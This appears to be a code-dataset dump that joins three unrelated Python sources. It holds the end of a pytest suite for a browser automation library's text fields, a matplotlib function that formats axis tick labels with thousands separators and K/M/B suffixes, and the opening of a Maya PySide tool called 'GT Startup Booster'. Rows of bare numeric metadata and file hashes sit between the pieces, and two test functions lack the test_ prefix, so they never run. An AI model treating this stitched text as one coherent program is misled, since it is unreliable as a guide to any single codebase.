def test_returns_the_title_if_the_element_exists_and_has_title(self, browser):
assert browser.text_field(id='new_user_code').title == 'Your personal code'
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_title_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).title
# type
def test_returns_the_type_if_the_element_exists_and_has_type(self, browser):
assert browser.text_field(index=3).type == 'text'
def returns_text_if_the_type_attribute_is_invalid(self, browser):
assert browser.text_field(id='new_user_last_name').type == 'text'
def returns_text_if_the_type_attribute_does_not_exist(self, browser):
assert browser.text_field(id='new_user_first_name').type == 'text'
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_type_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).type
# value
def test_returns_the_value_if_the_element_exists_and_has_value(self, browser):
assert browser.text_field(name='new_user_occupation').value == 'Developer'
assert browser.text_field(index=4).value == 'Developer'
assert browser.text_field(name=compile(r'new_user_occupation',
flags=IGNORECASE)).value == 'Developer'
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_value_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).value
def test_finds_all_attribute_methods(browser):
assert hasattr(browser.text_field(index=0), 'class_name')
assert hasattr(browser.text_field(index=0), 'id')
assert hasattr(browser.text_field(index=0), 'name')
assert hasattr(browser.text_field(index=0), 'title')
assert hasattr(browser.text_field(index=0), 'type')
assert hasattr(browser.text_field(index=0), 'value')
class TestTextFieldAccessMethods(object):
# enabled
def test_returns_true_for_enabled_text_fields(self, browser):
assert browser.text_field(name='new_user_occupation').enabled is True
assert browser.text_field(id='new_user_email').enabled is True
def test_returns_false_for_disabled_text_fields(self, browser):
assert browser.text_field(name='new_user_species').enabled is False
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_enabled_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).enabled
# disabled
def test_returns_true_for_disabled_text_fields(self, browser):
assert browser.text_field(name='new_user_species').disabled is True
def test_returns_false_for_enabled_text_fields(self, browser):
assert browser.text_field(index=0).disabled is False
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_disabled_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).disabled
# readonly
def test_returns_true_for_readonly(self, browser):
assert browser.text_field(name='new_user_code').readonly is True
assert browser.text_field(id='new_user_code').readonly is True
def test_returns_false_for_writable_text_fields(self, browser):
assert browser.text_field(name='new_user_email').readonly is False
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_for_readonly_if_the_element_doesnt_exist(self, browser):
with pytest.raises(UnknownObjectException):
browser.text_field(index=1337).readonly
@pytest.mark.usefixtures('quick_timeout')
def test_raises_correct_exception_if_sending_keys_to_readonly_element(self, browser):
with pytest.raises(ObjectReadOnlyException):
browser.text_field(id='new_user_code').set('foo')
| 48.787129
| 104
| 0.750279
| 1,379
| 9,855
| 5.029007
| 0.096447
| 0.107714
| 0.182264
| 0.199856
| 0.836626
| 0.80995
| 0.752704
| 0.680894
| 0.596107
| 0.536265
| 0
| 0.006258
| 0.156875
| 9,855
| 201
| 105
| 49.029851
| 0.828379
| 0.039371
| 0
| 0.123188
| 0
| 0
| 0.108031
| 0.016083
| 0
| 0
| 0
| 0
| 0.485507
| 1
| 0.23913
| false
| 0
| 0.028986
| 0
| 0.289855
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c13a021fb762848140916a86c40d1682f349a2e6
| 29,791
|
py
|
Python
|
grplot/features/sep/tick_sep/tick_sep_def.py
|
ghiffaryr/grplot
|
43ea08febac4ffecbce0a6a3d679850f5013aa28
|
[
"BSD-3-Clause"
] | null | null | null |
grplot/features/sep/tick_sep/tick_sep_def.py
|
ghiffaryr/grplot
|
43ea08febac4ffecbce0a6a3d679850f5013aa28
|
[
"BSD-3-Clause"
] | null | null | null |
grplot/features/sep/tick_sep/tick_sep_def.py
|
ghiffaryr/grplot
|
43ea08febac4ffecbce0a6a3d679850f5013aa28
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib as mpl
from matplotlib import ticker
import locale
from pandas.api.types import is_float_dtype, is_integer_dtype
def tick_sep_def(ax, axis, sep):
lim = mpl.rcParams["axes.formatter.limits"] # default: lim = [-5,6]
if axis == 'x':
# comma
if sep == ',':
xnum = []
for x in ax.get_xticks():
if (abs(x) <= 10**lim[0] and abs(x) != 0) or abs(x) >= 10**lim[1]:
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
xnum = []
break
elif abs(x) > 10**lim[0] and abs(x) < 1:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x))
else: # abs(x) >= 1 and abs(x) < 10**lim[1]
if is_float_dtype(type(x)) == True:
if x.is_integer() == True:
xnum.append('{:,}'.format(int(x)))
else:
xnum.append('{:,.1f}'.format(x))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}'.format(x))
else:
pass
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
elif sep == ',c':
xnum = []
for x in ax.get_xticks():
if abs(x) <= 10**lim[0] and abs(x) != 0:
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
xnum = []
break
elif abs(x) > 10**lim[0] and abs(x) < 1:
if (abs(x) == 0) or (abs(x) >= 0.01):
xnum.append('{:,.2f}'.format(x))
else:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x))
else: # abs(x) >= 1
xnum.append('{:,.2f}'.format(x))
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
elif sep in [',L', ',cL']:
xnum = []
for x in ax.get_xticks():
if abs(x) <= 10**lim[0] and abs(x) != 0:
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
xnum = []
break
else: # abs(x) > 10**lim[0]
if abs(x) < 1:
if sep == ',cL' and ((abs(x) == 0) or (abs(x) >= 0.01)):
xnum.append('{:,.2f}'.format(x))
else:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x))
elif abs(x) < 1_000:
if sep == ',L':
if is_float_dtype(type(x)) == True:
if x.is_integer() == True:
xnum.append('{:,}'.format(int(x)))
else:
xnum.append('{:,.1f}'.format(x))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}'.format(x))
else:
pass
else: # sep == ',cL'
xnum.append('{:,.2f}'.format(x))
elif abs(x) < 1_000_000:
num = x/1_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}K'.format(int(num)))
else:
xnum.append('{:,.1f}K'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}K'.format(num))
else:
pass
elif abs(x) < 1_000_000_000:
num = x/1_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}M'.format(int(num)))
else:
xnum.append('{:,.1f}M'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}M'.format(num))
else:
pass
elif abs(x) < 1_000_000_000_000:
num = x/1_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}B'.format(int(num)))
else:
xnum.append('{:,.1f}B'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}B'.format(num))
else:
pass
elif abs(x) < 1_000_000_000_000_000:
num = x/1_000_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}T'.format(int(num)))
else:
xnum.append('{:,.1f}T'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}T'.format(num))
else:
pass
else: # abs(x) >= 1_000_000_000_000_000:
num = x/1_000_000_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}Q'.format(int(num)))
else:
xnum.append('{:,.1f}Q'.format(num))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}Q'.format(num))
else:
pass
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
# dot
elif sep == '.':
xnum = []
for x in ax.get_xticks():
if (abs(x) <= 10**lim[0] and abs(x) != 0) or abs(x) >= 10**lim[1]:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=True))
xnum = []
break
elif abs(x) > 10**lim[0] and abs(x) < 1:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else: # abs(x) >= 1 and abs(x) < 10**lim[1]
if is_float_dtype(type(x)) == True:
if x.is_integer() == True:
xnum.append('{:,}'.format(int(x)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
elif sep == '.c':
xnum = []
for x in ax.get_xticks():
if abs(x) <= 10**lim[0] and abs(x) != 0:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=True))
xnum = []
break
elif abs(x) > 10**lim[0] and abs(x) < 1:
if (abs(x) == 0) or (abs(x) >= 0.01):
xnum.append('{:,.2f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else: # abs(x) >= 1
xnum.append('{:,.2f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
elif sep in ['.L', '.cL']:
xnum = []
for x in ax.get_xticks():
if abs(x) <= 10**lim[0] and abs(x) != 0:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
xnum = []
break
else: # abs(x) > 10**lim[0]
if abs(x) < 1:
if sep == '.cL' and ((abs(x) == 0) or (abs(x) >= 0.01)):
xnum.append('{:,.2f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
x = round(x, abs(lim[0]))
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
elif abs(x) < 1_000:
if sep == '.L':
if is_float_dtype(type(x)) == True:
if x.is_integer() == True:
xnum.append('{:,}'.format(int(x)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
else: # sep == '.cL'
xnum.append('{:,.2f}'.format(x).replace(',', '~').replace('.', ',').replace('~', '.'))
elif abs(x) < 1_000_000:
num = x/1_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}K'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}K'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}K'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(x) < 1_000_000_000:
num = x/1_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}M'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}M'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}M'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(x) < 1_000_000_000_000:
num = x/1_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}B'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}B'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}B'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(x) < 1_000_000_000_000_000:
num = x/1_000_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}T'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}T'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}T'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
else: # abs(x) >= 1_000_000_000_000_000:
num = x/1_000_000_000_000_000
if is_float_dtype(type(x)) == True:
if num.is_integer() == True:
xnum.append('{:,}Q'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
xnum.append('{:,.1f}Q'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(x)) == True:
xnum.append('{:,}Q'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
if xnum != []:
ax.set_xticks(ax.get_xticks())
ax.set_xticklabels(xnum)
else:
pass
else:
raise Exception('Unknown sep argument!')
elif axis == 'y':
# comma
if sep == ',':
ynum = []
for y in ax.get_yticks():
if (abs(y) <= 10**lim[0] and abs(y) != 0) or abs(y) >= 10**lim[1]:
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
ynum = []
break
elif abs(y) > 10**lim[0] and abs(y) < 1:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y))
else: # abs(y) >= 1 and abs(y) < 10**lim[1]
if is_float_dtype(type(y)) == True:
if y.is_integer() == True:
ynum.append('{:,}'.format(int(y)))
else:
ynum.append('{:,.1f}'.format(y))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}'.format(y))
else:
pass
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
elif sep == ',c':
ynum = []
for y in ax.get_yticks():
if abs(y) <= 10**lim[0] and abs(y) != 0:
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
ynum = []
break
elif abs(y) > 10**lim[0] and abs(y) < 1:
if (abs(y) == 0) or (abs(y) >= 0.01):
ynum.append('{:,.2f}'.format(y))
else:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y))
else: # abs(y) >= 1
ynum.append('{:,.2f}'.format(y))
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
elif sep in [',L', ',cL']:
ynum = []
for y in ax.get_yticks():
if abs(y) <= 10**lim[0] and abs(y) != 0:
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
ynum = []
break
else: # abs(y) > 10**lim[0]
if abs(y) < 1:
if sep == ',cL' and ((abs(y) == 0) or (abs(y) >= 0.01)):
ynum.append('{:,.2f}'.format(y))
else:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y))
elif abs(y) < 1_000:
if sep == ',L':
if is_float_dtype(type(y)) == True:
if y.is_integer() == True:
ynum.append('{:,}'.format(int(y)))
else:
ynum.append('{:,.1f}'.format(y))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}'.format(y))
else:
pass
else: # sep == ',cL'
ynum.append('{:,.2f}'.format(y))
elif abs(y) < 1_000_000:
num = y/1_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}K'.format(int(num)))
else:
ynum.append('{:,.1f}K'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}K'.format(num))
else:
pass
elif abs(y) < 1_000_000_000:
num = y/1_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}M'.format(int(num)))
else:
ynum.append('{:,.1f}M'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}M'.format(num))
else:
pass
elif abs(y) < 1_000_000_000_000:
num = y/1_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}B'.format(int(num)))
else:
ynum.append('{:,.1f}B'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}B'.format(num))
else:
pass
elif abs(y) < 1_000_000_000_000_000:
num = y/1_000_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}T'.format(int(num)))
else:
ynum.append('{:,.1f}T'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}T'.format(num))
else:
pass
else: # abs(y) >= 1_000_000_000_000_000:
num = y/1_000_000_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}Q'.format(int(num)))
else:
ynum.append('{:,.1f}Q'.format(num))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}Q'.format(num))
else:
pass
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
# dot
elif sep == '.':
ynum = []
for y in ax.get_yticks():
if (abs(y) <= 10**lim[0] and abs(y) != 0) or abs(y) >= 10**lim[1]:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=True))
ynum = []
break
elif abs(y) > 10**lim[0] and abs(y) < 1:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else: # abs(y) >= 1 and abs(y) < 10**lim[1]
if is_float_dtype(type(y)) == True:
if y.is_integer():
ynum.append('{:,}'.format(int(y)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
elif sep == '.c':
ynum = []
for y in ax.get_yticks():
if abs(y) <= 10**lim[0] and abs(y) != 0:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=True))
ynum = []
break
elif abs(y) > 10**lim[0] and abs(y) < 1:
if (abs(y) == 0) or (abs(y) >= 0.01):
ynum.append('{:,.2f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else: # abs(y) >= 1
ynum.append('{:,.2f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
elif sep in ['.L', '.cL']:
ynum = []
for y in ax.get_yticks():
if abs(y) <= 10**lim[0] and abs(y) != 0:
mpl.rcParams['axes.formatter.use_locale'] = True
locale.setlocale(locale.LC_NUMERIC, "de")
ax.yaxis.set_major_formatter(ticker.ScalarFormatter(useLocale=False))
ynum = []
break
else: # abs(y) > 10**lim[0]
if abs(y) < 1:
if sep == '.cL' and ((abs(y) == 0) or (abs(y) >= 0.01)):
ynum.append('{:,.2f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
y = round(y, abs(lim[0]))
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
elif abs(y) < 1_000:
if sep == '.L':
if is_float_dtype(type(y)) == True:
if y.is_integer() == True:
ynum.append('{:,}'.format(int(y)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
else: # sep == '.cL'
ynum.append('{:,.2f}'.format(y).replace(',', '~').replace('.', ',').replace('~', '.'))
elif abs(y) < 1_000_000:
num = y/1_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}K'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}K'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}K'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(y) < 1_000_000_000:
num = y/1_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}M'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}M'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}M'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(y) < 1_000_000_000_000:
num = y/1_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}B'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}B'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}B'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
elif abs(y) < 1_000_000_000_000_000:
num = y/1_000_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}T'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}T'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}T'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
else: # abs(y) >= 1_000_000_000_000_000:
num = y/1_000_000_000_000_000
if is_float_dtype(type(y)) == True:
if num.is_integer() == True:
ynum.append('{:,}Q'.format(int(num)).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
ynum.append('{:,.1f}Q'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
elif is_integer_dtype(type(y)) == True:
ynum.append('{:,}Q'.format(num).replace(',', '~').replace('.', ',').replace('~', '.'))
else:
pass
if ynum != []:
ax.set_yticks(ax.get_yticks())
ax.set_yticklabels(ynum)
else:
pass
else:
raise Exception('Unknown sep argument!')
else:
raise Exception('Unsupported axis!')
mpl.rcParams['axes.formatter.use_locale'] = False
return ax
| 52.914742
| 124
| 0.351247
| 2,743
| 29,791
| 3.679548
| 0.032446
| 0.155355
| 0.053502
| 0.089171
| 0.975032
| 0.973645
| 0.970376
| 0.962449
| 0.951154
| 0.943624
| 0
| 0.043453
| 0.473163
| 29,791
| 563
| 125
| 52.914742
| 0.599618
| 0.016683
| 0
| 0.863309
| 0
| 0
| 0.044313
| 0.006697
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001799
| false
| 0.071942
| 0.007194
| 0
| 0.010791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
c1546c9b3964886da733b2d62dd59f21432d9d87
| 57,214
|
py
|
Python
|
python-scripts/gt_startup_booster.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
python-scripts/gt_startup_booster.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
python-scripts/gt_startup_booster.py
|
freemanpro/gt-tools
|
d24c81b047f680fe8d35ae99cd0effcbb21b73bc
|
[
"MIT"
] | null | null | null |
"""
GT Startup Booster - A script for managing which plugins get loaded when starting Maya.
@Guilherme Trevisan - TrevisanGMW@gmail.com - 2020-11-20 - github.com/TrevisanGMW
"""
try:
from shiboken2 import wrapInstance
except ImportError:
from shiboken import wrapInstance
try:
from PySide2 import QtWidgets, QtGui, QtCore
from PySide2.QtGui import QIcon
from PySide2.QtWidgets import QWidget
except ImportError:
from PySide import QtWidgets, QtGui, QtCore
from PySide.QtGui import QIcon, QWidget
import maya.cmds as cmds
import maya.mel as mel
import maya.OpenMayaUI as omui
import sys
# Script Version
script_version = "1.0"
# Script Version
script_name = "GT Startup Booster"
def build_gui_startup_booster():
''' Builds the UI for GT Startup Booster'''
if cmds.window("build_gui_startup_booster", exists =True):
cmds.deleteUI("build_gui_startup_booster")
# main dialog Start Here =================================================================================
build_gui_startup_booster = cmds.window("build_gui_startup_booster", title='GT Startup Booster - (v' + script_version + ')',\
titleBar=True,minimizeButton=False,maximizeButton=False, sizeable =True)
cmds.window(build_gui_startup_booster, e=True, s=True, wh=[1,1])
content_main = cmds.columnLayout(adj = True)
# Title Text
title_bgc_color = (.4, .4, .4)
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 330)], cs=[(1, 10)], p=content_main) # Window Size Adjustment
cmds.rowColumnLayout(nc=3, cw=[(1, 10), (2, 260), (3, 50)], cs=[(1, 10), (2, 0), (3, 0)], p=content_main) # Title Column
cmds.text(" ", bgc=title_bgc_color) # Tiny Empty Green Space
cmds.text(script_name, bgc=title_bgc_color, fn="boldLabelFont", align="left")
cmds.button( l ="Help", bgc=title_bgc_color, c=lambda x:build_gui_help_startup_booster())
cmds.separator(h=3, style='none', p=content_main) # Empty Space
cmds.separator(h=5, style='none') # Empty Space
cell_size = 65
cmds.rowColumnLayout(p=content_main, numberOfColumns=4, columnWidth=[(1, 110), (2, cell_size),(3,cell_size),(4,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5)])
cmds.text('Plugin File')
cmds.text('Auto Load')
cmds.text('Installed')
cmds.text('Control')
plugin_name_font = 'smallPlainLabelFont'
# Arnold
cmds.separator(h=5, style='none') # Empty Space
cmds.rowColumnLayout(p=content_main, numberOfColumns=4, columnWidth=[(1, 110), (2, cell_size),(3,cell_size),(4,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5)])
cmds.text('"mtoa.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('mtoa_autoload', label='...', bgc=(.2,.2,.2))
cmds.text('mtoa_loaded',label='...', bgc=(.3,.3,.3))
cmds.text(label='Arnold', bgc=(.3,.3,.3))
# Redshift
cmds.separator(h=2, style='none') # Empty Space
cmds.rowColumnLayout(p=content_main, numberOfColumns=4, columnWidth=[(1, 110), (2, cell_size),(3,cell_size),(4,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5)])
cmds.text('"redshift4maya.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('redshift4maya_autoload', label='...', bgc=(.2,.2,.2))
cmds.text('redshift4maya_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Redshift', bgc=(.3,.3,.3))
# Bifrost
cmds.separator(h=2, style='none') # Empty Space
cmds.rowColumnLayout(p=content_main, numberOfColumns=4, columnWidth=[(1, 110), (2, cell_size),(3,cell_size),(4,cell_size)], cs=[(1,10),(2,5),(3,5),(4,5)])
cmds.text('"Boss.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('Boss_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('Boss_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Bifrost', bgc=(.3,.3,.3))
cmds.text('"bifmeshio.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('bifmeshio_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('bifmeshio_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Bifrost', bgc=(.3,.3,.3))
cmds.text('"bifrostGraph.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('bifrostGraph_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('bifrostGraph_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Bifrost', bgc=(.3,.3,.3))
cmds.text('"bifrostvisplugin.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('bifrostvisplugin_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('bifrostvisplugin_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Bifrost', bgc=(.3,.3,.3))
cmds.text('"mayaVnnPlugin.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('mayaVnnPlugin_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('mayaVnnPlugin_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Bifrost', bgc=(.3,.3,.3))
cmds.text('"bifrostshellnode.mll"', bgc=(.2,.2,.2), fn=plugin_name_font)
cmds.text('bifrostshellnode_autoload', label='... ', bgc=(.2,.2,.2))
cmds.text('bifrostshellnode_loaded', label='...', bgc=(.3,.3,.3))
cmds.text(label='Bifrost', bgc=(.3,.3,.3))
